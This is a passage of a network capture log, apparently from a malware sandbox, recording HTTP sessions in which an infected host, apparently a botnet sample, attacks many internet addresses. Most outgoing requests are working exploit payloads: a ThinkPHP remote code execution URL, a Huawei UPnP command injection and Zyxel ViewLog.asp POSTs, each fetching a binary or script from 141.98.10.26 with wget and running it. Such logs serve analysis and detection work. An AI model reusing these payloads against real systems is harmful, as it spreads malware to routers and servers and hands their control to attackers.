Nov 22, 2023 08:40:27.246932983 CET	19043	IN	HTTP/1.1 400 Bad Request Server: Web server Date: Wed, 22 Nov 2023 07:40:20 GMT Content-Type: text/html Content-Length: 155 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 57 65 62 20 73 65 72 76 65 72 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>Web server</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
960	192.168.2.23	58114	95.107.4.56	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:40:27.031045914 CET	19016	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:40:27.254556894 CET	19044	IN	HTTP/1.0 400 Bad Request Connection: close Content-Length: 113 Date: Wed, 22 Nov 2023 07:40:27 GMT Expires: 0 Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 30 3a 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 45 72 72 6f 72 20 34 30 30 3a 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><head><title>Error 400: Bad Request</title></head><body><h1>Error 400: Bad Request</h1></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
961	192.168.2.23	52898	95.173.137.55	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:40:27.046260118 CET	19017	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:40:27.353883028 CET	19069	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:40:27.592616081 CET	19077	IN	HTTP/1.1 400 Bad Request Server: nginx Date: Wed, 22 Nov 2023 07:40:27 GMT Content-Type: text/html Content-Length: 150 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
962	192.168.2.23	60070	95.100.188.177	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:40:27.060501099 CET	19018	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:40:27.312851906 CET	19068	IN	HTTP/1.0 400 Bad Request Server: AkamaiGHost Mime-Version: 1.0 Content-Type: text/html Content-Length: 257 Expires: Wed, 22 Nov 2023 07:40:27 GMT Date: Wed, 22 Nov 2023 07:40:27 GMT Connection: close Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 62 36 64 31 66 35 35 37 26 23 34 36 3b 31 37 30 30 36 33 38 38 32 37 26 23 34 36 3b 39 32 38 30 30 39 32 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http://%5bNo%20Host%5d/index.php?", is invalid.<p>Reference #9.b6d1f557.1700638827.9280092</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
963	192.168.2.23	33666	154.194.135.14	23

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:40:27.365607977 CET	19069	IN	HTTP/1.0 200 OK Server: Proxy Data Raw: 0d 0a 0d 0a 0d 0a 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 38 39 2e 31 34 39 2e 31 38 2e 36 30 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 33 2d 31 31 2d 32 32 20 31 35 3a 33 36 3a 33 36 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 e6 97 a0 e6 95 88 e7 94 a8 e6 88 b7 2e 0d 0a 0d 0a 0d 0a Data Ascii: Unauthorized ...IP Address: 89.149.18.60MAC Address: Server Time: 2023-11-22 15:36:36Auth Result: .

Session ID	Source IP	Source Port	Destination IP	Destination Port
964	192.168.2.23	33698	154.194.135.14	23

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:40:28.021764040 CET	19139	IN	HTTP/1.0 200 OK Server: Proxy Data Raw: 0d 0a 0d 0a 0d 0a 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 38 39 2e 31 34 39 2e 31 38 2e 36 30 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 33 2d 31 31 2d 32 32 20 31 35 3a 33 36 3a 33 37 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 e6 97 a0 e6 95 88 e7 94 a8 e6 88 b7 2e 0d 0a 0d 0a 0d 0a Data Ascii: Unauthorized ...IP Address: 89.149.18.60MAC Address: Server Time: 2023-11-22 15:36:37Auth Result: .

Session ID	Source IP	Source Port	Destination IP	Destination Port
965	192.168.2.23	41388	197.0.96.197	37215

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:40:28.467237949 CET	19186	OUT	POST /ctrlt/DeviceUpgrade_1 HTTP/1.1 Content-Length: 430 Connection: keep-alive Accept: / Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669" Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 34 31 2e 39 38 2e 31 30 2e 32 36 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 6d 69 70 73 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 141.98.10.26 -l /tmp/binary -r /mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary mips)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Nov 22, 2023 08:40:28.701236963 CET	19190	IN	HTTP/1.1 500 Internal Server Error Content-Type: text/xml; charset="utf-8" Server: Linux UPnP/1.0 Huawei-ATP-IGD EXT: Connection: Keep-Alive Content-Length: 398

Session ID	Source IP	Source Port	Destination IP	Destination Port
966	192.168.2.23	41260	88.47.36.34	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:40:28.513564110 CET	19187	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:40:28.710437059 CET	19191	IN	HTTP/1.1 400 Bad Request Date: Wed, 22 Nov 2023 07:40:28 GMT Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.4.16 Content-Length: 226 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
967	192.168.2.23	33704	154.194.135.14	23

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:40:28.684942961 CET	19189	IN	HTTP/1.0 200 OK Server: Proxy Data Raw: 0d 0a 0d 0a 0d 0a 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 38 39 2e 31 34 39 2e 31 38 2e 36 30 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 33 2d 31 31 2d 32 32 20 31 35 3a 33 36 3a 33 37 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 e6 97 a0 e6 95 88 e7 94 a8 e6 88 b7 2e 0d 0a 0d 0a 0d 0a Data Ascii: Unauthorized ...IP Address: 89.149.18.60MAC Address: Server Time: 2023-11-22 15:36:37Auth Result: .

Session ID	Source IP	Source Port	Destination IP	Destination Port
968	192.168.2.23	46994	95.100.34.118	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:40:28.926789999 CET	19253	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:40:29.263226032 CET	19260	IN	HTTP/1.1 400 Bad Request Server: nginx/1.14.0 (Ubuntu) Date: Wed, 22 Nov 2023 07:40:29 GMT Content-Type: text/html Content-Length: 182 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>
Nov 22, 2023 08:40:29.308706045 CET	19261	IN	HTTP/1.1 400 Bad Request Server: nginx/1.14.0 (Ubuntu) Date: Wed, 22 Nov 2023 07:40:29 GMT Content-Type: text/html Content-Length: 182 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>
Nov 22, 2023 08:40:29.408385992 CET	19346	IN	HTTP/1.1 400 Bad Request Server: nginx/1.14.0 (Ubuntu) Date: Wed, 22 Nov 2023 07:40:29 GMT Content-Type: text/html Content-Length: 182 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
969	192.168.2.23	59496	95.215.241.39	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:40:28.945102930 CET	19254	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:40:29.180121899 CET	19258	IN	HTTP/1.1 400 Bad Request Date: Wed, 22 Nov 2023 07:40:30 GMT Server: Apache/2.2.15 (CentOS) Content-Length: 226 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
970	192.168.2.23	45960	95.86.79.209	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:40:28.946482897 CET	19254	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0

Session ID	Source IP	Source Port	Destination IP	Destination Port
971	192.168.2.23	54620	94.247.142.213	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:40:29.051122904 CET	19256	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
972	192.168.2.23	33714	154.194.135.14	23

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:40:29.334353924 CET	19262	IN	HTTP/1.0 200 OK Server: Proxy Data Raw: 0d 0a 0d 0a 0d 0a 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 38 39 2e 31 34 39 2e 31 38 2e 36 30 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 33 2d 31 31 2d 32 32 20 31 35 3a 33 36 3a 33 38 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 e6 97 a0 e6 95 88 e7 94 a8 e6 88 b7 2e 0d 0a 0d 0a 0d 0a Data Ascii: Unauthorized ...IP Address: 89.149.18.60MAC Address: Server Time: 2023-11-22 15:36:38Auth Result: .

Session ID	Source IP	Source Port	Destination IP	Destination Port
973	192.168.2.23	48066	31.186.101.4	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:40:29.374743938 CET	19345	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:40:29.574703932 CET	19360	IN	HTTP/1.1 404 Not Found Date: Wed, 22 Nov 2023 10:59:07 GMT Server: Apache/2.4.6 (CentOS) Content-Length: 294 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 36 20 28 43 65 6e 74 4f 53 29 20 53 65 72 76 65 72 20 61 74 20 31 39 32 2e 31 36 38 2e 30 2e 31 34 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /cgi-bin/ViewLog.asp was not found on this server.</p><hr><address>Apache/2.4.6 (CentOS) Server at 192.168.0.14 Port 80</address></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
974	192.168.2.23	36144	31.136.82.54	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:40:29.759363890 CET	19363	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:40:30.333396912 CET	19444	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:40:31.453310966 CET	19596	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
